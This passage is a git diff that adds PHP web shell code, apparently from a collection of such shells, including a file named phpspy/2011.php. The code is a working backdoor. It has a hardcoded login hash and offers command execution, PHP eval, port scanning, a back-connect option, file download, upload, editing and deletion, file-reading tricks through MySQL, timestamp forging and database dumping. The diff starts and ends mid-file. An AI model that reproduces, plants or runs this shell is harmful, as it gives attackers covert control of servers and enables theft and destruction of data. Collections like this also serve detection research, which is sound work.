+			$ext = getextension($file);
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				GetWFileList($f);
+			} elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
+				if (is_writable($f)) {
+					$filedata[$j]['filename']=str_replace($nowpath,'',$f);
+					$filedata[$j]['size']=sizecount(@filesize($f));
+					$filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$filedata[$j]['filechmod']=getChmod($f);
+					$filedata[$j]['fileperm']=getPerms($f);
+					$filedata[$j]['fileowner']=getUser($f);
+					$filedata[$j]['dirlink']=$dir;
+					$filedata[$j]['server_link']=$f;
+					$filedata[$j]['client_link']=ue($f);
+					$j++;
+				}
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $filedata;
+	} else {
+		return array();
+	}
+}
+
+function GetSFileList($dir, $content, $re = 0) {
+	global $filedata,$j,$nowpath, $writabledb;
+	!$j && $j=1;
+	if ($dh = opendir($dir)) {
+		while ($file = readdir($dh)) {
+			$ext = getextension($file);
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				GetSFileList($f, $content, $re = 0);
+			} elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
+				$find = 0;
+				if ($re) {
+					if ( preg_match('@'.$content.'@',$file) || preg_match('@'.$content.'@', @file_get_contents($f)) ){
+						$find = 1;
+					}
+				} else {
+					if ( strstr($file, $content) || strstr( @file_get_contents($f),$content ) ) {
+						$find = 1;
+					}
+				}
+				if ($find) {
+					$filedata[$j]['filename']=str_replace($nowpath,'',$f);
+					$filedata[$j]['size']=sizecount(@filesize($f));
+					$filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$filedata[$j]['filechmod']=getChmod($f);
+					$filedata[$j]['fileperm']=getPerms($f);
+					$filedata[$j]['fileowner']=getUser($f);
+					$filedata[$j]['dirlink']=$dir;
+					$filedata[$j]['server_link']=$f;
+					$filedata[$j]['client_link']=ue($f);
+					$j++;
+				}
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $filedata;
+	} else {
+		return array();
+	}
+}
+
+function qy($sql) { 
+	//echo $sql.'<br>';
+	$res = $error = '';
+	if(!$res = @mysql_query($sql)) { 
+		return 0;
+	} else if(is_resource($res)) {
+		return 1; 
+	} else {
+		return 2;
+	}	
+	return 0;
+}
+
+function q($sql) { 
+	return @mysql_query($sql);
+}
+
+function fr($qy){
+	mysql_free_result($qy);
+}
+
+//mssql
+function msq($sql) { 
+	return @mssql_query($sql);
+}
+
+function msfr($qy){
+	mssql_free_result($qy);
+}
+
+function msmsg(){
+	return mssql_get_last_message();
+}
+
+function msqy($sql) { 
+	//echo $sql.'<br>';
+	$res = $error = '';
+	if(!$res = @mssql_query($sql)) { 
+		return 0;
+	} else if(is_resource($res)) {
+		return 1; 
+	} else {
+		return 2;
+	}	
+	return 0;
+}
+
+function sizecount($size) {
+	if($size > 1073741824) {
+		$size = round($size / 1073741824 * 100) / 100 . ' G';
+	} elseif($size > 1048576) {
+		$size = round($size / 1048576 * 100) / 100 . ' M';
+	} elseif($size > 1024) {
+		$size = round($size / 1024 * 100) / 100 . ' K';
+	} else {
+		$size = $size . ' B';
+	}
+	return $size;
+}
+
+// ѹËõ´ò°üÀà
+class PHPZip{
+	var $out='';
+	function PHPZip($dir)	{
+		if (@function_exists('gzcompress'))	{
+			$curdir = getcwd();
+			if (is_array($dir)) $filelist = $dir;
+			else{
+				$filelist=$this -> GetFileList($dir);//ÎļþÁбí
+				foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
+			}
+			if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
+			else chdir($curdir);
+			if (count($filelist)>0){
+				foreach($filelist as $filename){
+					if (is_file($filename)){
+						$fd = fopen ($filename, 'r');
+						$content = @fread ($fd, filesize($filename));
+						fclose ($fd);
+						if (is_array($dir)) $filename = basename($filename);
+						$this -> addFile($content, $filename);
+					}
+				}
+				$this->out = $this -> file();
+				chdir($curdir);
+			}
+			return 1;
+		}
+		else return 0;
+	}
+
+	// »ñµÃÖ¸¶¨Ä¿Â¼ÎļþÁбí
+	function GetFileList($dir){
+		static $a;
+		if (is_dir($dir)) {
+			if ($dh = opendir($dir)) {
+				while ($file = readdir($dh)) {
+					if($file!='.' && $file!='..'){
+						$f=$dir .'/'. $file;
+						if(is_dir($f)) $this->GetFileList($f);
+						$a[]=$f;
+					}
+				}
+				closedir($dh);
+			}
+		}
+		return $a;
+	}
+
+	var $datasec      = array();
+	var $ctrl_dir     = array();
+	var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+	var $old_offset   = 0;
+
+	function unix2DosTime($unixtime = 0) {
+		$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+		if ($timearray['year'] < 1980) {
+			$timearray['year']    = 1980;
+			$timearray['mon']     = 1;
+			$timearray['mday']    = 1;
+			$timearray['hours']   = 0;
+			$timearray['minutes'] = 0;
+			$timearray['seconds'] = 0;
+		} // end if
+		return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+				($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+	}
+
+	function addFile($data, $name, $time = 0) {
+		$name = str_replace('\\', '/', $name);
+
+		$dtime = dechex($this->unix2DosTime($time));
+		$hexdtime	= '\x' . $dtime[6] . $dtime[7]
+					. '\x' . $dtime[4] . $dtime[5]
+					. '\x' . $dtime[2] . $dtime[3]
+					. '\x' . $dtime[0] . $dtime[1];
+		eval('$hexdtime = "' . $hexdtime . '";');
+		$fr	= "\x50\x4b\x03\x04";
+		$fr	.= "\x14\x00";
+		$fr	.= "\x00\x00";
+		$fr	.= "\x08\x00";
+		$fr	.= $hexdtime;
+
+		$unc_len = strlen($data);
+		$crc = crc32($data);
+		$zdata = gzcompress($data);
+		$c_len = strlen($zdata);
+		$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+		$fr .= pack('v', strlen($name));
+		$fr .= pack('v', 0);
+		$fr .= $name;
+		$fr .= $zdata;
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+
+		$this -> datasec[] = $fr;
+		$new_offset = strlen(implode('', $this->datasec));
+
+		$cdrec = "\x50\x4b\x01\x02";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x14\x00";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x08\x00";
+		$cdrec .= $hexdtime;
+		$cdrec .= pack('V', $crc);
+		$cdrec .= pack('V', $c_len);
+		$cdrec .= pack('V', $unc_len);
+		$cdrec .= pack('v', strlen($name) );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('V', 32 );
+		$cdrec .= pack('V', $this -> old_offset );
+		$this -> old_offset = $new_offset;
+		$cdrec .= $name;
+
+		$this -> ctrl_dir[] = $cdrec;
+	}
+
+	function file() {
+		$data    = implode('', $this -> datasec);
+		$ctrldir = implode('', $this -> ctrl_dir);
+		return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) .	pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
+	}
+}
+
+// ±¸·ÝÊý¾Ý¿â
+function sqldumptable($table, $fp=0) {
+	$tabledump = "DROP TABLE IF EXISTS $table;\n";
+	$tabledump .= "CREATE TABLE $table (\n";
+
+	$firstfield=1;
+
+	$fields = q("SHOW FIELDS FROM $table");
+	while ($field = mysql_fetch_array($fields)) {
+		if (!$firstfield) {
+			$tabledump .= ",\n";
+		} else {
+			$firstfield=0;
+		}
+		$tabledump .= "   $field[Field] $field[Type]";
+		if (!empty($field["Default"])) {
+			$tabledump .= " DEFAULT '$field[Default]'";
+		}
+		if ($field['Null'] != "YES") {
+			$tabledump .= " NOT NULL";
+		}
+		if ($field['Extra'] != "") {
+			$tabledump .= " $field[Extra]";
+		}
+	}
+	fr($fields);
+
+	$keys = q("SHOW KEYS FROM $table");
+	while ($key = mysql_fetch_array($keys)) {
+		$kname=$key['Key_name'];
+		if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
+			$kname="UNIQUE|$kname";
+		}
+		if(!is_array($index[$kname])) {
+			$index[$kname] = array();
+		}
+		$index[$kname][] = $key['Column_name'];
+	}
+	fr($keys);
+
+	while(list($kname, $columns) = @each($index)) {
+		$tabledump .= ",\n";
+		$colnames=implode($columns,",");
+
+		if ($kname == "PRIMARY") {
+			$tabledump .= "   PRIMARY KEY ($colnames)";
+		} else {
+			if (substr($kname,0,6) == "UNIQUE") {
+				$kname=substr($kname,7);
+			}
+			$tabledump .= "   KEY $kname ($colnames)";
+		}
+	}
+
+	$tabledump .= "\n);\n\n";
+	if ($fp) {
+		fwrite($fp,$tabledump);
+	} else {
+		echo $tabledump;
+	}
+
+	$rows = q("SELECT * FROM $table");
+	$numfields = mysql_num_fields($rows);
+	while ($row = mysql_fetch_array($rows)) {
+		$tabledump = "INSERT INTO $table VALUES(";
+
+		$fieldcounter=-1;
+		$firstfield=1;
+		while (++$fieldcounter<$numfields) {
+			if (!$firstfield) {
+				$tabledump.=", ";
+			} else {
+				$firstfield=0;
+			}
+
+			if (!isset($row[$fieldcounter])) {
+				$tabledump .= "NULL";
+			} else {
+				$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
+			}
+		}
+
+		$tabledump .= ");\n";
+
+		if ($fp) {
+			fwrite($fp,$tabledump);
+		} else {
+			echo $tabledump;
+		}
+	}
+	fr($rows);
+	if ($fp) {
+		fwrite($fp,"\n");
+	} else {
+		echo "\n";
+	}
+}
+
+function ue($str){
+	return urlencode($str);
+}
+
+function p($str){
+	echo $str."\n";
+}
+
+function tbhead() {
+	p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
+}
+function tbfoot(){
+	p('</table>');
+}
+
+function makehide($name,$value=''){
+	p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
+}
+
+function makeinput($arg = array()){
+	$arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
+	$arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
+	!$arg['type'] && $arg['type'] = 'text';
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	$arg['class'] = $arg['class'] ? $arg['class'] : 'input';
+	if ($arg['newline']) {
+		p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
+	} else {
+		p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
+	}
+}
+
+function makeselect($arg = array()){
+	if ($arg['onchange']) {
+		$onchange = 'onchange="'.$arg['onchange'].'"';
+	}
+	$arg['title'] = $arg['title'] ? $arg['title'] : '';
+	if ($arg['newline']) p('<p>');
+	p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
+		if (is_array($arg['option'])) {
+			if ($arg['nokey']) {
+				foreach ($arg['option'] as $value) {
+					if ($arg['selected']==$value) {
+						p("<option value=\"$value\" selected>$value</option>");
+					} else {
+						p("<option value=\"$value\">$value</option>");
+					}
+				}
+			} else {
+				foreach ($arg['option'] as $key=>$value) {
+					if ($arg['selected']==$key) {
+						p("<option value=\"$key\" selected>$value</option>");
+					} else {
+						p("<option value=\"$key\">$value</option>");
+					}
+				}
+			}
+		}
+	p("</select>");
+	if ($arg['newline']) p('</p>');
+}
+function formhead($arg = array()) {
+	global $self;
+	!$arg['method'] && $arg['method'] = 'post';
+	!$arg['action'] && $arg['action'] = $self;
+	$arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
+	!$arg['name'] && $arg['name'] = 'form1';
+	p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
+	if ($arg['title']) {
+		p('<h2>'.$arg['title'].' &raquo;</h2>');
+	}
+}
+	
+function maketext($arg = array()){
+	!$arg['cols'] && $arg['cols'] = 100;
+	!$arg['rows'] && $arg['rows'] = 25;
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
+}
+
+function formfooter($name = ''){
+	!$name && $name = 'submit';
+	p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>');
+	p('</form>');
+}
+
+function goback(){
+	global $self, $nowpath;
+	p('<form action="'.$self.'" method="post"><input type="hidden" name="action" value="file" /><input type="hidden" name="dir" value="'.$nowpath.'" /><p><input class="bt" type="submit" value="Go back..."></p></form>');
+}
+
+function formfoot(){
+	p('</form>');
+}
+
+// µ÷ÊÔº¯Êý
+function pr($a) {
+	echo '<pre>';
+	print_r($a);
+	echo '</pre>';
+}
+
+?>
\ No newline at end of file
diff --git a/php/phpspy/2011.php b/php/phpspy/2011.php
new file mode 100644
index 0000000..d259138
--- /dev/null
+++ b/php/phpspy/2011.php
@@ -0,0 +1,2141 @@
+<?php
+error_reporting(7);
+@set_magic_quotes_runtime(0);
+ob_start();
+$mtime = explode(' ', microtime());
+$starttime = $mtime[1] + $mtime[0];
+define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
+define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
+define('IS_COM', class_exists('COM') ? 1 : 0 );
+define('IS_GPC', get_magic_quotes_gpc());
+$dis_func = get_cfg_var('disable_functions');
+define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
+@set_time_limit(0);
+
+foreach($_POST as $key => $value) {
+	if (IS_GPC) {
+		$value = s_array($value);
+	}
+	$$key = $value;
+}
+/*===================== ³ÌÐòÅäÖà =====================*/
+
+//echo encode_pass('angel');exit;
+
+// Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë,Áô¿ÕΪ²»ÐèÒªÑéÖ¤
+$pass  = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel
+
+//ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓÐÌØÊâÒªÇó, »òµÇ¼²»Õý³£, ÇëÐÞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ
+// cookie ǰ׺
+$cookiepre = '';
+// cookie ×÷ÓÃÓò
+$cookiedomain = '';
+// cookie ×÷Ó÷¾¶
+$cookiepath = '/';
+// cookie ÓÐЧÆÚ
+$cookielife = 86400;
+
+//³ÌÐòËÑË÷¿ÉдÎļþµÄÀàÐÍ
+!$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp';
+/*===================== ÅäÖýáÊø =====================*/
+
+$charsetdb = array('','armscii8','ascii','big5','binary','cp1250','cp1251','cp1256','cp1257','cp850','cp852','cp866','cp932','dec8','euc-jp','euc-kr','gb2312','gbk','geostd8','greek','hebrew','hp8','keybcs2','koi8r','koi8u','latin1','latin2','latin5','latin7','macce','macroman','sjis','swe7','tis620','ucs2','ujis','utf8');
+if ($charset == 'utf8') {
+	header("content-Type: text/html; charset=utf-8");
+} elseif ($charset == 'big5') {
+	header("content-Type: text/html; charset=big5");
+} elseif ($charset == 'gbk') {
+	header("content-Type: text/html; charset=gbk");
+} elseif ($charset == 'latin1') {
+	header("content-Type: text/html; charset=iso-8859-2");
+} elseif ($charset == 'euc-kr') {
+	header("content-Type: text/html; charset=euc-kr");
+} elseif ($charset == 'euc-jp') {
+	header("content-Type: text/html; charset=euc-jp");
+}
+
+$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
+$timestamp = time();
+
+/*===================== Éí·ÝÑéÖ¤ =====================*/
+if ($action == "logout") {
+	scookie('loginpass', '', -86400 * 365);
+	@header('Location: '.$self);
+	exit;
+}
+if($pass) {
+	if ($action == 'login') {
+		if ($pass == encode_pass($password)) {
+			scookie('loginpass',encode_pass($password));
+			@header('Location: '.$self);
+			exit;
+		}
+	}
+	if ($_COOKIE['loginpass']) {
+		if ($_COOKIE['loginpass'] != $pass) {
+			loginpage();
+		}
+	} else {
+		loginpage();
+	}
+}
+/*===================== ÑéÖ¤½áÊø =====================*/
+
+$errmsg = '';
+!$action && $action = 'file';
+
+// ²é¿´PHPINFO
+if ($action == 'phpinfo') {
+	if (IS_PHPINFO) {
+		phpinfo();
+		exit;
+	} else {
+		$errmsg = 'phpinfo() function has non-permissible';
+	}
+}
+
+// ÏÂÔØÎļþ
+if ($doing == 'downfile' && $thefile) {
+	if (!@file_exists($thefile)) {
+		$errmsg = 'The file you want Downloadable was nonexistent';
+	} else {
+		$fileinfo = pathinfo($thefile);
+		header('Content-type: application/x-'.$fileinfo['extension']);
+		header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+		header('Content-Length: '.filesize($thefile));
+		@readfile($thefile);
+		exit;
+	}
+}
+
+// Ö±½ÓÏÂÔر¸·ÝÊý¾Ý¿â
+if ($doing == 'backupmysql' && !$saveasfile) {
+	if (!$table) {
+		$errmsg ='Please choose the table';
+	} else {
+		mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		$filename = basename($dbname.'.sql');
+		header('Content-type: application/unknown');
+		header('Content-Disposition: attachment; filename='.$filename);
+		foreach($table as $k => $v) {
+			if ($v) {
+				sqldumptable($v);
+			}
+		}
+		mysql_close();
+		exit;
+	}
+}
+
+// ͨ¹ýMYSQLÏÂÔØÎļþ
+if($doing=='mysqldown'){
+	if (!$dbname) {
+		$errmsg = 'Please input dbname';
+	} else {
+		mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		if (!file_exists($mysqldlfile)) {
+			$errmsg = 'The file you want Downloadable was nonexistent';
+		} else {
+			$result = q("select load_file('$mysqldlfile');");
+			if(!$result){
+				q("DROP TABLE IF EXISTS tmp_angel;");
+				q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
+				//ÓÃʱ¼ä´ÁÀ´±íʾ½Ø¶Ï,±ÜÃâ³öÏÖ¶ÁÈ¡×ÔÉí»ò°üº¬__angel_1111111111_eof__µÄÎļþʱ²»ÍêÕûµÄÇé¿ö
+				q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
+				$result = q("select content from tmp_angel");
+				q("DROP TABLE tmp_angel");
+			}
+			$row = @mysql_fetch_array($result);
+			if (!$row) {
+				$errmsg = 'Load file failed '.mysql_error();
+			} else {
+				$fileinfo = pathinfo($mysqldlfile);
+				header('Content-type: application/x-'.$fileinfo['extension']);
+				header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+				header("Accept-Length: ".strlen($row[0]));
+				echo $row[0];
+				exit;
+			}
+		}
+	}
+}
+
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gbk">
+<title><?php echo $action.' - '.$_SERVER['HTTP_HOST'];?></title>
+<style type="text/css">
+body,td{font: 12px Arial,Tahoma;line-height: 16px;}
+.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
+.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
+.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
+a {color: #00f;text-decoration:underline;}
+a:hover{color: #f00;text-decoration:none;}
+.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}
+.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;}
+.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;}
+.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;}
+.head td span{font-weight:normal;}
+.infolist {padding:10px;margin:10px 0 20px 0;background:#F1F1F1;border:1px solid #ddd;}
+form{margin:0;padding:0;}
+h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
+ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
+u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
+.drives{padding:5px;}
+.drives span {margin:auto 7px;}
+</style>
+<script type="text/javascript">
+function CheckAll(form) {
+	for(var i=0;i<form.elements.length;i++) {
+		var e = form.elements[i];
+		if (e.name != 'chkall')
+		e.checked = form.chkall.checked;
+    }
+}
+function $(id) {
+	return document.getElementById(id);
+}
+function createdir(){
+	var newdirname;
+	newdirname = prompt('Please input the directory name:', '');
+	if (!newdirname) return;
+	$('createdir').newdirname.value=newdirname;
+	$('createdir').submit();
+}
+function fileperm(pfile){
+	var newperm;
+	newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
+	if (!newperm) return;
+	$('fileperm').newperm.value=newperm;
+	$('fileperm').pfile.value=pfile;
+	$('fileperm').submit();
+}
+function copyfile(sname){
+	var tofile;
+	tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
+	if (!tofile) return;
+	$('copyfile').tofile.value=tofile;
+	$('copyfile').sname.value=sname;
+	$('copyfile').submit();
+}
+function rename(oldname){
+	var newfilename;
+	newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
+	if (!newfilename) return;
+	$('rename').newfilename.value=newfilename;
+	$('rename').oldname.value=oldname;
+	$('rename').submit();
+}
+function dofile(doing,thefile,m){
+	if (m && !confirm(m)) {
+		return;
+	}
+	$('filelist').doing.value=doing;
+	if (thefile){
+		$('filelist').thefile.value=thefile;
+	}
+	$('filelist').submit();
+}
+function createfile(nowpath){
+	var filename;
+	filename = prompt('Please input the file name:', '');
+	if (!filename) return;
+	opfile('editfile',nowpath + filename,nowpath);
+}
+function opfile(action,opfile,dir){
+	$('fileopform').action.value=action;
+	$('fileopform').opfile.value=opfile;
+	$('fileopform').dir.value=dir;
+	$('fileopform').submit();
+}
+function godir(dir,view_writable){
+	if (view_writable) {
+		$('godir').view_writable.value=view_writable;
+	}
+	$('godir').dir.value=dir;
+	$('godir').submit();
+}
+function getsize(getdir,dir){
+	$('getsize').getdir.value=getdir;
+	$('getsize').dir.value=dir;
+	$('getsize').submit();
+}
+function editrecord(action, base64, tablename){
+	if (action == 'del') {		
+		if (!confirm('Is or isn\'t deletion record?')) return;
+	}
+	$('recordlist').doing.value=action;
+	$('recordlist').base64.value=base64;
+	$('recordlist').tablename.value=tablename;
+	$('recordlist').submit();
+}
+function moddbname(dbname) {
+	if(!dbname) return;
+	$('setdbname').dbname.value=dbname;
+	$('setdbname').submit();
+}
+function settable(tablename,doing,page) {
+	if(!tablename) return;
+	if (doing) {
+		$('settable').doing.value=doing;
+	}
+	if (page) {
+		$('settable').page.value=page;
+	}
+	$('settable').tablename.value=tablename;
+	$('settable').submit();
+}
+function s(action,nowpath,p1,p2,p3,p4,p5) {
+	if(action) $('opform').action.value=action;
+	if(nowpath) $('opform').nowpath.value=nowpath;
+	if(p1) $('opform').p1.value=p1;
+	if(p2) $('opform').p2.value=p2;
+	if(p3) $('opform').p3.value=p3;
+	if(p4) $('opform').p4.value=p4;
+	if(p5) $('opform').p4.value=p5;
+}
+function g(action,nowpath,p1,p2,p3,p4,p5) {
+	if(!action) return;
+	s(action,nowpath,p1,p2,p3,p4,p5);
+	$('opform').submit();
+}
+</script>
+</head>
+<body style="margin:0;table-layout:fixed; word-break:break-all">
+<?php
+formhead(array('name'=>'opform'));
+makehide('action', $action);
+makehide('nowpath', $nowpath);
+makehide('p1', $p1);
+makehide('p2', $p2);
+makehide('p3', $p3);
+makehide('p4', $p4);
+makehide('p5', $p5);
+formfoot();
+
+if(!function_exists('posix_getegid')) {
+	$user = @get_current_user();
+	$uid = @getmyuid();
+	$gid = @getmygid();
+	$group = "?";
+} else {
+	$uid = @posix_getpwuid(@posix_geteuid());
+	$gid = @posix_getgrgid(@posix_getegid());
+	$user = $uid['name'];
+	$uid = $uid['uid'];
+	$group = $gid['name'];
+	$gid = $gid['gid'];
+}
+
+?>
+<table width="100%" border="0" cellpadding="0" cellspacing="0">
+	<tr class="head">
+		<td><span style="float:right;"><?php echo @php_uname();?> / User:<?php echo $uid.' ( '.$user.' ) / Group: '.$gid.' ( '.$group.' )';?></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
+	</tr>
+	<tr class="alt1">
+		<td>
+			<span style="float:right;">PHP <?php echo PHP_VERSION;?> / Safe Mode:<?php echo getcfg('safe_mode');?></span>
+			<a href="javascript:g('logout');">Logout</a> | 
+			<a href="javascript:g('file');">File Manager</a> | 
+			<a href="javascript:g('mysqladmin');">MYSQL Manager</a> | 
+			<a href="javascript:g('sqlfile');">MySQL Upload &amp; Download</a> | 
+			<a href="javascript:g('shell');">Execute Command</a> | 
+			<a href="javascript:g('phpenv');">PHP Variable</a> | 
+			<a href="javascript:g('portscan');">Port Scan</a> | 
+			<a href="javascript:g('secinfo');">Security information</a> | 
+			<a href="javascript:g('eval');">Eval PHP Code</a>
+			<?php if (!IS_WIN) {?> | <a href="javascript:g('backconnect');">Back Connect</a><?php }?>
+		</td>
+	</tr>
+</table>
+<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
+<?php
+$errmsg && m($errmsg);
+
+// »ñÈ¡µ±Ç°Â·¾¶
+if (!$dir) {
+	$dir = $_SERVER["DOCUMENT_ROOT"] ? $_SERVER["DOCUMENT_ROOT"] : '.';
+}
+$nowpath = getPath(SA_ROOT, $dir);
+if (substr($dir, -1) != '/') {
+	$dir = $dir.'/';
+}
+
+if ($action == 'file') {
+
+	// Åж϶ÁдÇé¿ö
+	$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
+
+	// ´´½¨Ä¿Â¼
+	if ($newdirname) {
+		$mkdirs = $nowpath.$newdirname;
+		if (file_exists($mkdirs)) {
+			m('Directory has already existed');
+		} else {
+			m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
+			@chmod($mkdirs,0777);
+		}
+	}
+
+	// ÉÏ´«Îļþ
+	elseif ($doupfile) {
+		m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
+	}
+
+	// ±à¼­Îļþ
+	elseif ($editfilename && $filecontent) {
+		$fp = @fopen($editfilename,'w');
+		m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
+		@fclose($fp);
+	}
+
+	// ±à¼­ÎļþÊôÐÔ
+	elseif ($pfile && $newperm) {
+		if (!file_exists($pfile)) {
+			m('The original file does not exist');
+		} else {
+			$newperm = base_convert($newperm,8,10);
+			m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
+		}
+	}
+
+	// ¸ÄÃû
+	elseif ($oldname && $newfilename) {
+		$nname = $nowpath.$newfilename;
+		if (file_exists($nname) || !file_exists($oldname)) {
+			m($nname.' has already existed or original file does not exist');
+		} else {
+			m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
+		}
+	}
+
+	// ¸´ÖÆÎļþ
+	elseif ($sname && $tofile) {
+		if (file_exists($tofile) || !file_exists($sname)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
+		}
+	}
+
+	// ¿Ë¡ʱ¼ä
+	elseif ($curfile && $tarfile) {
+		if (!@file_exists($curfile) || !@file_exists($tarfile)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			$time = @filemtime($tarfile);
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// ×Ô¶¨Òåʱ¼ä
+	elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
+		if (!@file_exists($curfile)) {
+			m(basename($curfile).' does not exist');
+		} else {
+			$time = strtotime("$year-$month-$day $hour:$minute:$second");
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// ÅúÁ¿É¾³ýÎļþ
+	elseif($doing == 'delfiles') {
+		if ($dl) {
+			$dfiles='';
+			$succ = $fail = 0;
+			foreach ($dl as $filepath) {
+				if (is_dir($filepath)) {
+					if (@deltree($filepath)) {
+						$succ++;
+					} else {
+						$fail++;
+					}
+				} else {
+					if (@unlink($filepath)) {
+						$succ++;
+					} else {
+						$fail++;
+					}
+				}
+			}
+			m('Deleted folder/file have finished,choose '.count($dl).' success '.$succ.' fail '.$fail);
+		} else {
+			m('Please select folder/file(s)');
+		}
+	}
+
+	//²Ù×÷Íê±Ï
+	formhead(array('name'=>'createdir'));
+	makehide('newdirname');
+	makehide('dir',$nowpath);
+	formfoot();
